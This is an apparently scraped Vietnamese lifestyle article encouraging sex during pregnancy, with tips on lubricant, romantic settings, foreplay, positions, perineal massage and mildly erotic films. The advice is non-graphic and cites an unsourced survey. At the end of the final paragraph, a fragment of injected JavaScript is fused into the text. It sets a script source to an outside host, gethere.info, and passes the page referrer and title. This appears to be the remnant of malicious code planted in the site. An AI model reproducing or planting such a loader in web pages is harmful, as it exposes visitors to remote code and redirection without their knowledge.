“Yêu” không đắn đo khi bầu bí

Rất nhiều chị em bầu chia sẻ rằng việc quan hệ tình dục trong thời gian “đeo bao lô ngược” quả thật quá khó khăn mặc dù họ có thai kỳ khỏe mạnh bình thường. Đồng ý rằng, khi mang bầu cơ thể sẽ nặng nề hơn, cảm giác mệt mỏi, khó chịu sẽ làm mẹ bầu không có ham muốn “yêu”. Nhưng các mẹ đừng quá biện minh vì những lý do đó bởi bạn có biết rằng “yêu” lúc này sẽ cải thiện những “tác dụng phụ” kể trên không?

Một lợi ích nữa cũng xin nêu ra đây để cổ vũ chị em đừng ngại ngần với chuyện ấy khi mang thai. Không ít chị em rỉ tai nhau than phiền rằng sợ chồng đi “ăn chả” lúc vợ mang bầu. Nguyên nhân thì ai cũng biết, đó là khi bầu bí các mẹ thường “bỏ đói” chồng. Vì vậy, cách tốt nhất là hãy khéo léo chiều anh xã để cuộc sống chăn gối của bạn được êm ấm.

Hai lý do trên đã đủ để mẹ sẵn sàng bước vào cuộc “yêu” chưa? Nếu bạn vẫn còn ngại ngần, hãy tham khảo những chiêu dưới đây để cuộc yêu của hai vợ chồng khi bầu bí vẫn thật nồng nàn:

Sử dụng thuốc bôi trơn

Sự thay đổi kích thích tố khi mang thai có thể khiến vùng kín chị em bị khôn hạn. Đây là lý do chính khiến các mẹ ngại “yêu” và khiến cuộc “yêu” không trọn vẹn. Biện pháp là chị em có thể sử dụng những loại chất bôi trơn. Hãy sử dụng những hàng đảm bảo để được an toàn cho hai vợ chồng và em bé trong bụng nhé.

1393474864-1
Chuyện ấy không hề gây hại nếu bạn có thai kỳ khỏe mạnh bình thường. (ảnh minh họa)

Tạo không gian lãng mạn

Nếu hôm nay là kỷ niệm ngày yêu nhau, ngày cưới hoặc một dịp đặc biệt nào đó, mẹ hoàn toàn có thể chuẩn bị cho căn phòng ngủ có thêm ánh nến và hoa. Một không gian ấm áp, lãng mạn chắc chắn sẽ khiến cảm hứng yêu của cả hai vợ chồng bạn thăng hoa “lên đỉnh” đó.

Nghe nhạc

Các cặp đôi cũng có thể mở những bản nhạc nhẹ nhàng mà mình yêu thích hoặc xem một bộ phim lãng mạn. Khi ấy bạn cũng dễ dàng bước vào cuộc yêu hơn.

Đừng quên “màn dạo đầu”

Phải khẳng định rằng, chắc chắn không một cặp đôi nào vừa nằm đã có thể “yêu” được ngay. Mẹ bầu nên học cách vuốt ve hoặc hôn nhẹ vào gáy chàng, tương tự nam giới cũng hành động như thế, đảm bảo cảm hứng yêu sẽ dâng trào.

Đổi tư thế “yêu”

Khi bụng bầu lớn dần, chị em sẽ cảm thấy không thực sự thoải mái với những tư thế yêu thông thường. Lúc này, hãy tìm hiểu về những tư thế yêu thuận lợi nhất cho bà bầu để chị em dễ dàng “lên đỉnh”.

“Yêu” không đắn đo khi bầu bí - 2
Theo khảo sát mới đây nhất đối với những cặp đôi có vợ đang bầu bí, tư thế “yêu” dễ chịu nhất với họ là “yêu” từ phía sau. (ảnh minh họa)

“Yêu” từ phía sau

Theo khảo sát mới đây nhất đối với những cặp đôi có vợ đang bầu bí, tư thế “yêu” dễ chịu nhất với họ là “yêu” từ phía sau. Nếu bạn cũng đang phân vân trong việc lựa chọn tư thế “yêu”, hãy tham khảo tư thế này nhé.

Massage tầng sinh môn

Massage tầng sinh môn là màn dạo đầu tuyệt vời trước cuộc yêu. Hãy hướng dẫn chồng cách ôm ấp rồi massage đến những bộ phận nhạy cảm trên cơ thể. Chắc chắn mẹ sẽ thích thú đến với cuộc ‘yêu’ đấy.

Xem phim

Nếu bạn cảm thấy cuộc sống chăn gối hai vợ chồng khi bạn mang bầu đang quá khô khan, hãy xem ngay một bộ phim tinh cảm có tính khiêu dâm một chút. Đây cũng là cách khiến các cặp đôi dễ dàng bước vào cuộc “yêu”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; .

1,201 lượt xem, 4 views todayTrả lời

Thư điện tử của bạn sẽ không được hiện thị công khai. Các trường bắt buộc được đánh dấu *

Bạn có thể sử dụng các thẻ HTML và thuộc tính sau: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>